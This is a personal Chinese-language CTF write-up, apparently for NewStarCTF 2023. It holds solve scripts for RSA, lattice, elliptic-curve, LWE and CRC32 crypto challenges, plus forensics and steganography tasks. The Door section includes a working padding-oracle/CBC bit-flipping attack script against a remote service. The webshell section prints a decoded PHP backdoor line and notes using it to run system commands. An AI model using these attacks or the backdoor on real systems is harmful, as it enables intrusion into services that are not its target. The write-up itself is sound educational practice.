n = 25505131259827344749407187081729819350996141100990518281765117676936124636084125400315049858697199427401342785804654120926568235761577895862889807660442415521870277729420875825744007886870384790308986342360349597392841568418588521694478184632631896474390291958350681472768485356865513284619086754437723630874827593280089682939629265210875169009057935264259019861755270570945614034505771690412042781423771110441028258110022746603974882162934979726300741541857444013708508946471384525030286343828680432038605288717842755346907256658746733811881247992925881684393431852248253701825024590345480994598867741811599162649467
S_ = 5510086561842250138908875342533294108331951659612671466695801343686972919443402163401521040457640602756777910081639191753436122171756174730531385913865951826869995984787102439679170684422717808771260217541439878677750508065703064081375473845405916674327932798153100574555933448570618732842365795738120491532398081467312017203933413296779070611024124965772787502242499016884537233028947865288037718074352448773759363242111080540630360902388540661831992776707600133253329779003707938065020121645530719140954554800986771763343191398210100325971573069812381693089384221441735278736889673500218274673196333806222266248844379127652366
S = 11422623501509574650959962952004985925543723972567988534433510888436662069119800576321679344425052011563473005275801787271861671898318523033415642388512047035650991047953319601346912194462122313366888126100093635969476696871403883687946617575837061694813669883782221006701704487938500886952347003631626326127154081787016692856628561200386941683756397734100698520464199249811238013146899352390453500132666840606585760306723894654933077094375810666168464835756607377998959675132305971721109661644231613426322675350973373434138686086023265910883509514575554429502214217460059521619625693750938117427832654792355808803321
ss = pow(S_, e, n) - m
for x in range(1 << 10):
    p = GCD(ss - x, n)
    if p != 1:
        break
q = n//p
print('flag{' + md5(str(p).encode()).hexdigest() + '}')
print('flag{' + md5(str(q).encode()).hexdigest() + '}')

其实,x=0,这跟论文是一样的

Door

嘶,真不熟这个AES-CBC的相关攻击,看看官方解释,得以后再回头看看吧
https://goodapple.top/archives/217
CBC字节翻转攻击
服务端会把密文解密之后的填充状态返回, 那么我们只要控制iv, 使得解密之后的明文产生"…\x01", “…\x02\x02” …的状态,获得明文为"\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10\x10"对应的IV, 然后利用xor把我们想要输入的内容合并到这个IV里面

from pwn import *
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from os import urandom
from tqdm import tqdm

r = remote(host, port)
auth_code = urandom(16)
token = urandom(16)
diff = [0] * 16
for i in reversed(range(16)):    
    for b in tqdm(range(256)):        
        diff[i] = b        
        tmp_tk = xor(token, bytes(diff))        
        r.sendlineafter(b'> ', b'1')        
        r.sendlineafter(b'> ', tmp_tk.hex().encode())        
        r.sendlineafter(b'> ', auth_code.hex().encode())        
        res = r.recvline()        
        if b'out' in res:            
            if i != 0:                
                for j in range(i, 16):                    
                    diff[j] ^= (16 - i) ^ (16 - i + 1)            
                    break
forged_token = xor(token, bytes(diff))
forged_token = xor(forged_token, b'\x10' * 16)
forged_token = xor(forged_token, pad(b'SoNP#1033', 16))
r.sendlineafter(b'> ', b'1')
r.sendlineafter(b'> ', forged_token.hex().encode())
r.sendlineafter(b'> ', auth_code.hex().encode())
r.interactive()
#flag{d0_n0t_3xpose_th3_padd1ng_5tatus}

week4

RSA Variation II

RSA进阶攻击方式,Schmidt Samoa密码体系
N=p2qN=p^{2}*q
dN1 mod ϕ(pq)d*N\equiv 1\ mod\ \phi(p*q)
c=mN(mod N)c=m^{N}(mod\ N)
m=cd(mod pq)m=c^{d}(mod\ p*q)
任取一个a(一般为2)aNd=ak(p1)(q1)+1=a(mod pq)任取一个a(一般为2),a^{Nd}=a^{k*(p-1)*(q-1)+1}=a(mod\ p*q)
aNdapqa^{Nd}-a|p*q
https://www.cnblogs.com/vconlln/p/17066497.html
这里我们只需获取到p*q

from Crypto.Util.number import *

c = 1653396627113549535760516503668455111392369905404419847336187180051939350514408518095369852411718553340156505246372037811032919080426885042549723125598742783778413642221563616358386699697645814225855089454045984443096447166740882693228043505960011332616740785976743150624114653594631779427044055729185392854961786323215146318588164139423925400772680226861699990332420246447180631417523181196631188540323779487858453719444807515638025771586275969579201806909799448813112034867089866513864971414742370516244653259347267231436131850871346106316007958256749016599758599549180907260093080500469394473142003147643172770078092713912200110043214435078277125844112816260967490086038358669788006182833272351526796228536135638071670829206746835346784997437044707950580087067666459222916040902038574157577881880027391425763503693184264104932693985833980182986816664377018507487697769866530103927375926578569947076633923873193100147751463
N = 1768427447158131856514034889456397424027937796617829756303525705316152314769129050888899742667986532346611229157207778487065194513722005516611969754197481310330149721054855689646133721600838194741123290410384315980339516947257172981002480414254023253269098539962527834174781356657779988761754582343096332391763560921491414520707112852896782970123018263505426447126195645371941116395659369152654368118569516482251442513192892626222576419747048343942947570016045016127917578272819812760632788343321742583353340158009324794626006731057267603803701663256706597904789047060978427573361035171008822467120148227698893238773305320215769410594974360573727150122036666987718934166622785421464647946084162895084248352643721808444370307254417501852264572985908550839933862563001186477021313236113690793843893640190378131373214104044465633483953616402680853776480712599669132572907096151664916118185486737463253559093537311036517461749439
d = 20650646933118544225095544552373007455928574480175801658168105227037950105642248948645762488881219576174131624593293487325329703919313156659700002234392400636474610143032745113473842675857323774566945229148664969659797779146488402588937762391470971617163496433008501858907585683428652637958844902909796849080799141999490231877378863244093900363251415972834146031490928923962271054053278056347181254936750536280638321211545167520935870220829786490686826062142415755063724639110568511969041175019898031990455911525941036727091961083201123910761290998968240338217895275414072475701909497518616112236380389851984377079
pq = GCD(pow(2, d*N, N)-2, N)
flag = long_to_bytes(pow(c, d, pq))
print(flag)

babyNTRU

题目源码

from secret import flag
from Crypto.Util.number import *

q = getPrime(2048)

f = getPrime(1024)
g = getPrime(768)

h = (inverse(f, q) * g) % q

m = bytes_to_long(flag)

e = (getPrime(32) * h + m) % q

print((h, q))
print(e)

# (8916452722821418463248726825721257021744194286874706915832444631771596616116491775091473142798867278598586482678387668986764461265131119164500473719939894343163496325556340181429675937641495981353857724627081847304246987074303722642172988864138967404024201246050387152854001746763104417773214408906879366958729744259612777257542351501592019483745621824894790096639205771421560295175633152877667720038396154571697861326821483170835238092879747297506606983322890706220824261581533324824858599082611886026668788577757970984892292609271082176311433507931993672945925883985629311514143607457603297458439759594085898425992, 31985842636498685945330905726539498901443694955736332073639744466389039373143618920511122288844282849407290205804991634167816417468703459229138891348115191921395278336695684210437130681337971686008048054340499654721317721241239990701099685207253476642931586563363638141636011941268962999641130263828151538489139254625099330199557503153680089387538863574480134898211311252227463870838947777479309928195791241005127445821671684607237706849308372923372795573732000365072815112119533702614620325238183899266147682193892866330678076925199674554569018103164228278742151778832319406135513140669049734660019551179692615505961)
# 20041713613876382007969284056698149007154248857420752520496829246324512197188211029665990713599667984019715503486507126224558092176392282486689347953069815123212779090783909545244160318938357529307482025697769394114967028564546355310883670462197528011181768588878447856875173263800885048676190978206851268887445527785387532167370943745180538168965461612097037041570912365648125449804109299630958840398397721916860876687808474004391843869813396858468730877627733234832744328768443830669469345926766882446378765847334421595034470639171397587395341977453536859946410431252287203312913117023084978959318406160721042580688

这时候看见这题,我好像在寒假的时候也见过类似的,当时找了篇文章(好像不是构造格),但是没做出来,emmm,应该找错了
下面的博客里有大佬几道格密码的学习
https://blog.csdn.net/m0_74345946/article/details/131742665

h=f1g(mod q)h=f^{-1}*g(mod\ q)
e=(xh+m)mod qe=(x*h+m)mod\ q
有,e=(xf1g+m)mod q有,e=(x*f^{-1}*g+m)mod\ q
ef=(xg+mf)mod qe*f=(x*g+m*f)mod\ q
想办法把这个x去掉,mf=((ef)mod q)mod g想办法把这个x去掉,m*f=((e*f)mod\ q)mod\ g
m=(((ef)mod q)f1)mod gm=(((e*f)mod\ q)*f^{-1})mod\ g
至此,我们需要知道f,g,同时,h,q是已知的至此,我们需要知道f,g,同时,h,q是已知的
g=kq+hf,构造格g=k*q+h*f,构造格

[kf][q0h1] =[gf]\left [ \begin{matrix} k&f\\ \end{matrix} \right ] * \left [ \begin{matrix} q&0\\ h&1\\ \end{matrix} \right ] \ = \left [ \begin{matrix} g&f\\ \end{matrix} \right ] 

from Crypto.Util.number import *

q = 31985842636498685945330905726539498901443694955736332073639744466389039373143618920511122288844282849407290205804991634167816417468703459229138891348115191921395278336695684210437130681337971686008048054340499654721317721241239990701099685207253476642931586563363638141636011941268962999641130263828151538489139254625099330199557503153680089387538863574480134898211311252227463870838947777479309928195791241005127445821671684607237706849308372923372795573732000365072815112119533702614620325238183899266147682193892866330678076925199674554569018103164228278742151778832319406135513140669049734660019551179692615505961
h = 8916452722821418463248726825721257021744194286874706915832444631771596616116491775091473142798867278598586482678387668986764461265131119164500473719939894343163496325556340181429675937641495981353857724627081847304246987074303722642172988864138967404024201246050387152854001746763104417773214408906879366958729744259612777257542351501592019483745621824894790096639205771421560295175633152877667720038396154571697861326821483170835238092879747297506606983322890706220824261581533324824858599082611886026668788577757970984892292609271082176311433507931993672945925883985629311514143607457603297458439759594085898425992
e = 20041713613876382007969284056698149007154248857420752520496829246324512197188211029665990713599667984019715503486507126224558092176392282486689347953069815123212779090783909545244160318938357529307482025697769394114967028564546355310883670462197528011181768588878447856875173263800885048676190978206851268887445527785387532167370943745180538168965461612097037041570912365648125449804109299630958840398397721916860876687808474004391843869813396858468730877627733234832744328768443830669469345926766882446378765847334421595034470639171397587395341977453536859946410431252287203312913117023084978959318406160721042580688
mat = [[q,0], [h, 1]]
M = Matrix(ZZ, mat)
g, f = M.LLL()[0]

m = (f * e % q * inverse(f, g)) % g
flag = long_to_bytes(int(m))
print(flag)

Smart

题目源码

from Crypto.Util.number import *
from sage.all import *
from secret import flag

p = 75206427479775622966537995406541077245842499523456803092204668034148875719001
a = 40399280641537685263236367744605671534251002649301968428998107181223348036480
b = 34830673418515139976377184302022321848201537906033092355749226925568830384464

E = EllipticCurve(GF(p), [a, b])

d = bytes_to_long(flag)

G = E.random_element()

P = d * G

print(G)
print(P)

# (63199291976729017585116731422181573663076311513240158412108878460234764025898 : 11977959928854309700611217102917186587242105343137383979364679606977824228558 : 1)
# (75017275378438543246214954287362349176908042127439117734318700769768512624429 : 39521483276009738115474714281626894361123804837783117725653243818498259351984 : 1)

椭圆曲线上的离散对数算法(ECDLP)
https://www.cnblogs.com/blackicelisa/p/15315636.html#三、阶数与p相等采用smart
ECC smart's attack

from Crypto.Util.number import *

p = 75206427479775622966537995406541077245842499523456803092204668034148875719001
a = 40399280641537685263236367744605671534251002649301968428998107181223348036480
b = 34830673418515139976377184302022321848201537906033092355749226925568830384464
E = EllipticCurve(GF(p), [a, b])
G = (63199291976729017585116731422181573663076311513240158412108878460234764025898,
     11977959928854309700611217102917186587242105343137383979364679606977824228558)
P = (75017275378438543246214954287362349176908042127439117734318700769768512624429,
     39521483276009738115474714281626894361123804837783117725653243818498259351984)

G = E(G)
P = E(P)


def SmartAttack(P, Q, p):
    E = P.curve()
    Eqp = EllipticCurve(
        Qp(p, 2), [ZZ(t) + randint(0, p)*p for t in E.a_invariants()])

    P_Qps = Eqp.lift_x(ZZ(P.xy()[0]), all=True)
    for P_Qp in P_Qps:
        if GF(p)(P_Qp.xy()[1]) == P.xy()[1]:
            break

    Q_Qps = Eqp.lift_x(ZZ(Q.xy()[0]), all=True)
    for Q_Qp in Q_Qps:
        if GF(p)(Q_Qp.xy()[1]) == Q.xy()[1]:
            break

    p_times_P = p*P_Qp
    p_times_Q = p*Q_Qp

    x_P, y_P = p_times_P.xy()
    x_Q, y_Q = p_times_Q.xy()

    phi_P = -(x_P/y_P)
    phi_Q = -(x_Q/y_Q)
    k = phi_Q/phi_P
    return ZZ(k)


d = SmartAttack(G, P, p)
print(long_to_bytes(d))

signin

源码

from Crypto.Util.number import isPrime,bytes_to_long, sieve_base
from random import choice
from secret import flag
 
m=bytes_to_long(flag)
def uniPrime(bits):
    while True:
        n = 2
        while n.bit_length() < bits:
            n *= choice(sieve_base)
        if isPrime(n + 1):
            return n + 1
 
 
p=uniPrime(512)
q=uniPrime(512)
n=p*q
e= 196608
c=pow(m,e,n)
 
print("n=",n)
print("c=",c)
 
'''
n= 3326716005321175474866311915397401254111950808705576293932345690533263108414883877530294339294274914837424580618375346509555627578734883357652996005817766370804842161603027636393776079113035745495508839749006773483720698066943577445977551268093247748313691392265332970992500440422951173889419377779135952537088733
c= 2709336316075650177079376244796188132561250459751152184677022745551914544884517324887652368450635995644019212878543745475885906864265559139379903049221765159852922264140740839538366147411533242116915892792672736321879694956051586399594206293685750573633107354109784921229088063124404073840557026747056910514218246
'''

分析可以看到,生成pq的函数的原理是小素数累乘,则p-1是光滑数,可以考虑用Pollard's p-1算法分解n,然后e=2163e=2^{16}*3,Rabin密码,最后开三次方根

from Crypto.Util.number import *
import gmpy2

n = 3326716005321175474866311915397401254111950808705576293932345690533263108414883877530294339294274914837424580618375346509555627578734883357652996005817766370804842161603027636393776079113035745495508839749006773483720698066943577445977551268093247748313691392265332970992500440422951173889419377779135952537088733
c = 2709336316075650177079376244796188132561250459751152184677022745551914544884517324887652368450635995644019212878543745475885906864265559139379903049221765159852922264140740839538366147411533242116915892792672736321879694956051586399594206293685750573633107354109784921229088063124404073840557026747056910514218246
N = n
a = 2
n = 2
while True:
    a = pow(a, n, N)
    res = GCD(a-1, N)
    if res != 1 and res != N:
        q = N // res
        p = res
        break
    n += 1

n = p*q
x0 = inverse(p, q)
x1 = inverse(q, p)
cs = [c]
for i in range(16):
    ps = []
    for c2 in cs:
        r = pow(c2, (p + 1) // 4, p)
        s = pow(c2, (q + 1) // 4, q)
        x = (r * x1 * q + s * x0 * p) % n
        y = (r * x1 * q - s * x0 * p) % n
        if x not in ps:
            ps.append(x)
        if n - x not in ps:
            ps.append(n - x)
        if y not in ps:
            ps.append(y)
        if n - y not in ps:
            ps.append(n - y)
    cs = ps
for m in ps:
    mm = gmpy2.iroot(m, 3)
    if mm[1]:
        flag = long_to_bytes(mm[0])
        print(flag)

error

题目源码

from sage.all import *
from secret import flag
import random
data = [ord(x) for x in flag]

mod = 0x42
n = 200
p = 5
q = 2**20

def E():
  return vector(ZZ, [1 - random.randint(0,p) for _ in range(n)])

def creatematrix():
  return matrix(ZZ, [[q//2 - random.randint(0,q) for _ in range(n)] for _ in range(mod)])

A, B, C= creatematrix(), creatematrix(), creatematrix()
x = vector(ZZ, data[0:mod])
y = vector(ZZ, data[mod:2*mod])
z = vector(ZZ, data[2*mod:3*mod])
e = E()
b = x*B+y*A+z*C + e
res = ""
res += "A=" + str(A) +'\n'
res += "B=" + str(B) +'\n'
res += "C=" + str(C) +'\n'
res += "b=" + str(b) +'\n'

with open("enc.out","w") as f:
  f.write(res)

容错学习问题(Learning with Errors, LWE)
会不了一点,看一下官方

"""
考点 lwe
FLAG:flag{try_lear1n_wi0h_t1e_error}
解题步骤
"""
import re
s2n=lambda x: [int(x) for x in re.findall(r"\-?\d+\.?\d*",x)]
f=open("./enc.out","r").readlines()
m = 66
n = 200
p = 5
q = 2^20
B = [s2n(f[i]) for i in range(m)]
A = [s2n(f[i+66]) for i in range(m)]
C = [s2n(f[i+132]) for i in range(m)]
# print(A)
# print(B)
# print(C)

b= list(matrix(ZZ,s2n(f[-1])))
m=A+B+C+b
M = matrix(ZZ,m)
L = M.LLL()
print(L[0])
res=M.solve_left(L[0])
for i in res[:-1]:
    print(chr(abs(i)),end="")

还有个参考
格基规约 + 矩阵求解
https://dexterjie.github.io/2023/11/04/赛题复现/NewStarCTF2023/#error

week5

last_signin

题目源码

from Crypto.Util.number import *
flag = b'?'

e = 65537
p, q = getPrime(1024), getPrime(1024)
N = p * q
gift = p&(2**923-2**101)
m = bytes_to_long(flag)
c = pow(m, e, N)

print("N = ",N)
print("gift = ",gift)
print("c = ",c)

"""
N =  12055968471523053394851394038007091122809367392467691213651520944038861796011063965460456285088011754895260428814358599592032865236006733879843493164411907032292051539754520574395252298997379020268868972160297893871261713263196092380416876697472160104980015554834798949155917292189278888914003846758687215559958506116359394743135211950575060201887025032694825084104792059271584351889134811543088404952977137809673880602946974798597506721906751835019855063462460686036567578835477249909061675845157443679947730585880392110482301750827802213877643649659069945187353987713717145709188790427572582689339643628659515017749
p0 =  70561167908564543355630347620333350122607189772353278860674786406663564556557177660954135010748189302104288155939269204559421198595262277064601483770331017282701354382190472661583444774920297367889959312517009682740631673940840597651219956142053575328811350770919852725338374144
c =  2475592349689790551418951263467994503430959303317734266333382586608208775837696436139830443942890900333873206031844146782184712381952753718848109663188245101226538043101790881285270927795075893680615586053680077455901334861085349972222680322067952811365366282026756737185263105621695146050695385626656638309577087933457566501579308954739543321367741463532413790712419879733217017821099916866490928476372772542254929459218259301608413811969763001504245717637231198848196348656878611788843380115493744125520080930068318479606464623896240289381601711908759450672519228864487153103141218567551083147171385920693325876018
"""

gift = p&(2**923-2**101),p的比特长度是大于923的,会造成p的中间位泄露
参考https://www.anquanke.com/post/id/193939#h3-28

from Crypto.Util.number import *

N =  
p0 =  
c =  

def bivariate(pol, XX, YY, kk=4):
    N = pol.parent().characteristic()

    f = pol.change_ring(ZZ)
    PR, (x, y) = f.parent().objgens()

    idx = [(k - i, i) for k in range(kk + 1) for i in range(k + 1)]
    monomials = list(map(lambda t: PR(x ** t[0] * y ** t[1]), idx))
    # collect the shift-polynomials
    g = []
    for h, i in idx:
        if h == 0:
            g.append(y ** h * x ** i * N)
        else:
            g.append(y ** (h - 1) * x ** i * f)

    # construct lattice basis
    M = Matrix(ZZ, len(g))
    for row in range(M.nrows()):
        for col in range(M.ncols()):
            h, i = idx[col]
            M[row, col] = g[row][h, i] * XX ** h * YY ** i

    # LLL
    B = M.LLL()

    PX = PolynomialRing(ZZ, 'xs')
    xs = PX.gen()
    PY = PolynomialRing(ZZ, 'ys')
    ys = PY.gen()

    # Transform LLL-reduced vectors to polynomials
    H = [(i, PR(0)) for i in range(B.nrows())]
    H = dict(H)
    for i in range(B.nrows()):
        for j in range(B.ncols()):
            H[i] += PR((monomials[j] * B[i, j]) / monomials[j](XX, YY))

    # Find the root
    poly1 = H[0].resultant(H[1], y).subs(x=xs)
    poly2 = H[0].resultant(H[2], y).subs(x=xs)
    poly = gcd(poly1, poly2)
    x_root = poly.roots()[0][0]

    poly1 = H[0].resultant(H[1], x).subs(y=ys)
    poly2 = H[0].resultant(H[2], x).subs(y=ys)
    poly = gcd(poly1, poly2)
    y_root = poly.roots()[0][0]

    return x_root, y_root

PR = PolynomialRing(Zmod(N), names='x,y')
x, y = PR.gens()
pol = 2 ** 923 * x + y + p0

x, y = bivariate(pol, 2 ** 101, 2 ** 101)
p = 2 ** 923 * x + y + p0
q = N // p
e=65537
d = inverse(e, (p - 1)*(q - 1))
m = int(pow(c, d, N))
print(long_to_bytes(m))

我之前在哪忘了(山河?),还遇到过p xor q的题目,这里贴一个脚本

#!/usr/bin/env python3

import math
import sys

def check_cong(k, p, q, n, xored=None):
    kmask = (1 << k) - 1
    p &= kmask
    q &= kmask
    n &= kmask
    pqm = (p*q) & kmask
    return pqm == n and (xored is None or (p^q) == (xored & kmask))

def extend(k, a):
    kbit = 1 << (k-1)
    assert a < kbit
    yield a
    yield a | kbit

def factor(n, p_xor_q):
    tracked = set([(p, q) for p in [0, 1] for q in [0, 1]
                   if check_cong(1, p, q, n, p_xor_q)])

    PRIME_BITS = int(math.ceil(math.log(n, 2)/2))

    maxtracked = len(tracked)
    for k in range(2, PRIME_BITS+1):
        newset = set()
        for tp, tq in tracked:
            for newp_ in extend(k, tp):
                for newq_ in extend(k, tq):
                    # Remove symmetry
                    newp, newq = sorted([newp_, newq_])
                    if check_cong(k, newp, newq, n, p_xor_q):
                        newset.add((newp, newq))

        tracked = newset
        if len(tracked) > maxtracked:
            maxtracked = len(tracked)
    print('Tracked set size: {} (max={})'.format(len(tracked), maxtracked))

    # go through the tracked set and pick the correct (p, q)
    for p, q in tracked:
        if p != 1 and p*q == n:
            return p, q

    assert False, 'factors were not in tracked set. Is your p^q correct?'

def main():
    if len(sys.argv) != 3:
        print('Usage: xor_factor.py n p_xor_q', file=sys.stderr)
        print('(give both numbers in decimal)', file=sys.stderr)

    n = 
    p_xor_q = 

    p, q = factor(n, p_xor_q)
    print(p)
    print(q)

if __name__ == '__main__':
    main()

School of CRC32

题目源码

import secrets
from secret import flag
import zlib

ROUND = 100

LENGTH = 20

print('Extreme hard CRC32 challenge')
print('ARE YOU READY')

for i in range(ROUND):
    print('ROUND', i, '!'*int(i/75 + 1))

    target = secrets.randbits(32)

    print('Here is my CRC32 value: ', hex(target))

    dat = input('Show me some data > ')
    raw = bytes.fromhex(dat)
    
    if zlib.crc32(raw) == target and len(raw) == LENGTH:
        print("GREAT")
    else:
        print("OH NO")
        exit()

print("Congratulation! Here is your flag")
print(flag)

CRC32碰撞,根据CRC32的值求原字符串
参考https://dexterjie.github.io/2023/11/04/赛题复现/NewStarCTF2023/#School-of-CRC32

from Crypto.Util.number import *
import crcsolver
import zlib
from pwn import *

sh = remote("node5.buuoj.cn", 28000)
for i in range(100):
    data = sh.recvuntil(b"Here is my CRC32 value:")
    c = eval(sh.recvline().decode())
    m = crcsolver.solve(b'_'*20, range(8*20), c, zlib.crc32)
    message = hex(bytes_to_long(m))[2:].zfill(40)
    sh.sendlineafter(b"Show me some data >", message)
sh.interactive()

需要注意的是,传给服务器的数据需要是16进制形式,而且,得填充满40位,否则报错
关键代码m = crcsolver.solve(b'_'*20, range(8*20), c, zlib.crc32)
需要下载crcsolver这个库

PseudoHell_EASY

润润润,复不了一点

PseudoHell_HARD

润润润

Misc

week1

CyberChef’s Secret

厨子秒了,签到题,base32->base58->base64

机密图片

直接扫二维码没有可用信息,010也没有找到,考虑lsb隐写,可以用工具Stegsolve,也可以zsteg -a secret.png(这个秒了)

流量!鲨鱼!

直接搜flag找不到,文件->导出对象->HTTP流
发现可疑文件

一开始发现挺多404请求的,想过滤一下,http && http.response.code == 200
发现好像找不到东西?然后就跑去导出对象了

压缩包们

第一步,修复压缩包,补回文件头50 4B 03 04
用bandzip继续打开,发现是损坏的,但其他软件显示加密了,同时有一段base64字符,解密提示我们6位数字密码,直接爆破
抽象,打不开,binwalk之后的也打不开,那就拿最开始的附件去binwalk一下,虽然还是提醒文件损坏,但打开了

emmm,好像我电脑的压缩包软件有一点问题,主用的bandzip不行的时候,就得换另一个试试,就很烦

空白格

第一周结束的时候,官方wp的是WhiteSpace语言:https://vii5ard.github.io/whitespace/
我去年9月份打的时候,我是用word打开发现,只有tab跟空格,然后想到二进制,转换01,然后有些细节不记得了,反正当时就这样打出来了

隐秘的眼睛

眼睛?那肯定SilentEye

week2

新建Word文档

word是空白的,直接binwalk一下(其实可以在Word里面通过某种方式找到的,但我习惯binwalk),新建Word文档.docx.extracted\word\document.xml,找到新佛曰,找个工具或网站,工具用的ToolsFx
http://hi.pcmoe.net/buddha.html
官方解释是,WPS清除格式,这个确实可以
Word要查看隐藏字体,然后我的Word打开就是了?

永不消逝的电波

拖入Audacity,一眼摩斯密码
..-. .-.. .- --. - .... . -... . ... - -.-. . ..-. . .-. .. ... -.-- --- ..-

1-序章

sql注入,发现每次注入的开头ASCII都是40,结尾不同,因为爆破成功了,所以结尾是flag的ASCII,把它们提出来
121 111 117 95 119 52 110 116 95 115 51 99 114 101 116 102 108 97 103 123 106 117 115 116 95 119 52 114 109 95 117 112 95 115 48 95 121 111 117 95 110 51 101 100 95 104 52 114 100 101 114 95 54 48 50 54 99 100 51 50 125 44
脚本?不太会写(应该用到正则表达式进行过滤提取),工作量还好,人力尚能应对QWQ

base!

base64?不对,base64隐写

table = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
file = open("base.txt")  # 文件地址
flag = ''
tmpbin = ''
for line in file.readlines():  # 按照行来读取文本
    line = line.strip('\n')
    if (line[-1] == '='):  # 当第一位是‘=’时
        if (line[-2] == '='):  # 当第二位是‘=’时
            i = table.index(line[-3])  # 返回倒数第三位的字符在字典中的位置
            b = bin(i)[2:]  # 二进制化后去掉ob前缀
            b = b.zfill(6)  # 将二进制数填充为6位
            tmpbin += b[-4:]
        else:
            i = table.index(line[-2])  # 返回倒数第二位的字符
            b = bin(i)[2:]
            b = b.zfill(6)
            tmpbin += b[-2:]
length = len(tmpbin) / 8  # 计算数据组数
for i in range(int(length)):
    flag += chr(int(tmpbin[i * 8:i * 8 + 8], 2))  # 对二进制数base64编码处理
print(flag)

赛博厨子解出来是base58

WebShell的利用

牛魔,套娃题。。。
eval(str_rot13(convert_uudecode(str_rot13(base64_decode()))));循环上了是吧,这脚本暂时还真不会写,套个官方脚本,好像循环了10次吧,要解码40下,真要手工的话,好像也能接受(bushi)

<?php
$shell = "eval(str_rot13(convert_uudecode(str_rot13(base64_decode('')))));";
for ($i = 0; $i < 50; $i++) {
    if (preg_match("/base64/", $shell)) {
        $temp = preg_replace("/eval/", "return", $shell);
        $shell = eval($temp);
    } else {
        break;
    }
}
echo $shell;

error_reporting(0);($_GET['7d67973a'])($_POST['9fa3']);

systemcat /f*即可

Jvav

Java盲水印,用一般的盲水印工具也看得见,但是超级模糊。。。还是太捞了
直接上Java盲水印工具
https://github.com/ww23/BlindWatermark

week3

阳光开朗大男孩

首先,社会主义核心价值观,非常阳光!
https://aghorler.github.io/emoji-aes/#

大怨种

一张GIF,但是不动的?
Stegsolve->Frame Browser->第二帧->汉信码,用中国编码这个软件
网站https://tuzim.net/hxdecode/

官方的逐帧提取脚本

from PIL import Image
import os

def extract_frames(gif_path, output_dir):
    gif = Image.open(gif_path)
    os.makedirs(output_dir, exist_ok=True)
    try:
        while True:
            current_frame = gif.tell()
            output_path = os.path.join(output_dir, f"frame_{current_frame}.png")
            gif.save(output_path, "PNG")
            gif.seek(current_frame + 1)
    except EOFError:
        pass
    print("提取完成!")
gif_path = "1.gif"
output_dir = "./res/"
extract_frames(gif_path, output_dir)

2-分析

要找到,攻击者登录使用的用户名,存在漏洞的文件名,WebShell文件名
登录一般是post请求,过滤http && http.request.method == POST
login.php,拿到用户名best_admin,这个导出http对象翻翻也很容易找到,也可以直接搜username,这个也挺快的

漏洞利用常用到system函数,直接搜,也能找到

所以得到,best_admin_index.php_wh1t3g0d.php

也可以参考官方,http && http.response.code != 404,过滤掉响应状态码为404的响应,进行分析

键盘侠

USB流量指的是USB设备接口的流量,攻击者能够通过监听usb接口流量获取键盘敲击键、鼠标移动与点击、存储设备的铭文传输通信、USB无线网卡网络传输内容等等。在CTF中,USB流量分析主要以键盘和鼠标流量为主。
先学习一下,https://blog.csdn.net/qq_43625917/article/details/107723635

发现键盘流量,过滤一下,usb.src=="1.15.1"
然后全部导出,操作为文件->导出特定分组,保存为usb.pcapng
使用tshark命令对流量数据进行提取并去除空行
tshark -r usb.pcapng -T fields -e usb.capdata | sed '/^\s*$/d' > usbdata.txt(Linux执行),提出来的数据是不带冒号的

normalKeys = {"04": "a", "05": "b", "06": "c", "07": "d", "08": "e", "09": "f", "0a": "g", "0b": "h", "0c": "i", "0d": "j", "0e": "k", "0f": "l", "10": "m", "11": "n", "12": "o", "13": "p", "14": "q", "15": "r", "16": "s", "17": "t", "18": "u", "19": "v", "1a": "w", "1b": "x", "1c": "y", "1d": "z", "1e": "1", "1f": "2", "20": "3", "21": "4", "22": "5", "23": "6", "24": "7", "25": "8", "26": "9", "27": "0",
              "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "t", "2c": "<SPACE>", "2d": "-", "2e": "=", "2f": "[", "30": "]", "31": "\\", "32": "<NON>", "33": ";", "34": "'", "35": "<GA>", "36": ",", "37": ".", "38": "/", "39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>", "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
shiftKeys = {"04": "A", "05": "B", "06": "C", "07": "D", "08": "E", "09": "F", "0a": "G", "0b": "H", "0c": "I", "0d": "J", "0e": "K", "0f": "L", "10": "M", "11": "N", "12": "O", "13": "P", "14": "Q", "15": "R", "16": "S", "17": "T", "18": "U", "19": "V", "1a": "W", "1b": "X", "1c": "Y", "1d": "Z", "1e": "!", "1f": "@", "20": "#", "21": "$", "22": "%", "23": "^", "24": "&", "25": "*",
             "26": "(", "27": ")", "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "t", "2c": "<SPACE>", "2d": "_", "2e": "+", "2f": "{", "30": "}", "31": "|", "32": "<NON>", "33": "\"", "34": ":", "35": "<GA>", "36": "<", "37": ">", "38": "?", "39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>", "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
nums = []
keys = open("usbdata.txt")
for line in keys:
    if len(line) != 17:
        continue
    nums.append(line[0:2]+line[4:6])
keys.close()
output = ""
for n in nums:
    if n[2:4] == "00":
        continue
    if n[2:4] in normalKeys:
        if n[0:2] == "02":
            output += shiftKeys[n[2:4]]
        else:
            output += normalKeys[n[2:4]]
    else:
        output += '[unknown]'
print('output :n' + output)
# 官方脚本
